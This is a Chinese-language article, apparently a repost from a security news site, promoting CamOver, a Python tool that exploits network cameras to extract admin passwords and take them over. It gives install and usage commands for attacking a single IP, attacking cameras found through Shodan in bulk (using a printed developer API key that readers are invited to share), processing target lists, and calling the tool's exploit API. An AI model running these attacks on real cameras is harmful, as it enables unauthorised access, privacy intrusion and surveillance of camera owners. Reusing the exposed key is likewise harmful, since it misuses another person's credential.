CamOver:一款功能强大的摄像头漏洞利用工具

安全 数据安全
CamOver是一款功能强大的摄像头漏洞利用工具,在该工具的帮助下,广大研究人员可以轻松破解掉你家网络摄像头的管理员密码,并接管你的摄像头。

[[414433]]

关于CamOver

CamOver是一款功能强大的摄像头漏洞利用工具,在该工具的帮助下,广大研究人员可以轻松破解掉你家网络摄像头的管理员密码,并接管你的摄像头。

功能介绍

  • 该工具能够发现并利用大多数主流型号网络摄像头中的安全漏洞,例如CCTV、GoAhead和Netwave等。
  • 经过优化,支持多线程同时攻击多个摄像头。
  • 简单的命令行接口和API用法。

工具安装

由于CamOver使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装CamOver:

  1. pip3 install git+https://github.com/EntySec/CamOver 

基础使用

CamOver的使用非常简单,我们只需要在命令行终端中输入“camover”命令即可使用CamOver:

  1. usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] 
  2.  
  3.                [--zoomeye ZOOMEYE] [-p PAGES] 
  4.  
  5.   
  6.  
  7. CamOver is a camera exploitation tool that allows to disclosure network camera 
  8.  
  9. admin password. 
  10.  
  11.   
  12.  
  13. optional arguments: 
  14.  
  15.   -h, --help            显示这个帮助信息并退出 
  16.  
  17.   -t, --threads          启用多线程模式以获得更好的性能 
  18.  
  19.   -o OUTPUT, --output OUTPUT 
  20.  
  21.                         将结果存储至文件 
  22.  
  23.   -i INPUT, --input INPUT 
  24.  
  25.                         地址输入文件 
  26.  
  27.   -a ADDRESS, --address ADDRESS 
  28.  
  29.                         提供单个地址 
  30.  
  31.   --shodan SHODAN       通过网络利用远程设备所使用的Shodan API密钥 
  32.  
  33.   --zoomeye ZOOMEYE     通过网络利用远程设备所使用的ZoomEye API密钥 
  34.  
  35.   -p PAGES, --pages PAGES 
  36.  
  37.                         需要通过ZoomEye获取的页面数量 

工具使用样例

(1) 攻击单个摄像头

下列命令可以攻击单个网络摄像头:

  1. camover -a 192.168.99.100 

(2) 通过网络攻击远程摄像头

接下来,我们可以使用Shodan搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:

  1. camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD 

注意:项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥,你可以使用你自己的密钥,当然了你想用开发人员的也没意见,大家资源共享嘛!

(3) 从输入文件获取目标摄像头

我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:

  1. camover -t -i cameras.txt -o passwords.txt 

注意:此命令将会攻击cameras.txt中给出的所有摄像头,并会将所有获取到的密码存储至passwords.txt文件中。

API使用

CamOver还提供了自己的Python API,可以将其导入至你们自己的项目代码中并调用其功能:

  1. from camover import CamOver 

调用样例

攻击单个摄像头:

  1. from camover import CamOver 
  2.  
  3.   
  4.  
  5. camover = CamOver() 
  6.  
  7. creds = camover.exploit('192.168.99.100') 
  8.  
  9.   
  10.  
  11. print(creds) 

项目地址

CamOver:【GitHub传送门

 

责任编辑:赵宁宁 来源: FreeBuf
相关推荐

2021-07-09 10:14:05

IP工具命令

2020-12-15 15:08:17

工具Java线程

2020-12-15 07:54:40

工具Hutoolgithub

2021-11-01 05:53:08

Doldrums逆向工程分析工具安全工具

2021-10-10 12:17:06

Weakpass在线字典生成器安全工具

2022-02-20 18:59:23

漏洞安全扫描工具

2023-10-08 07:51:07

HInvoke项目函数

2021-10-19 06:37:21

安全工具Qlog安全日志工具

2021-09-14 15:01:31

Pstf安全工具指纹框架

2021-12-02 18:14:37

PortBender定向工具安全工具

2021-11-11 11:39:39

MailRipV2SMTP安全工具

2020-10-05 21:26:32

工具代码开发

2021-08-10 08:39:06

SSH协议密码爆破安全工具

2023-03-31 07:59:02

2021-12-28 15:33:36

安全工具Stacs凭证扫描

2020-12-24 17:08:52

安全工具NoSql注入接口工具

2021-10-25 05:39:12

被动网络侦察工具Sigurlfind3安全工具

2022-01-13 09:27:26

SMBeagle安全审计工具安全工具

2023-08-30 08:24:34

2022-01-16 06:48:42

Jektor测试工具安全工具
点赞
收藏

51CTO技术栈公众号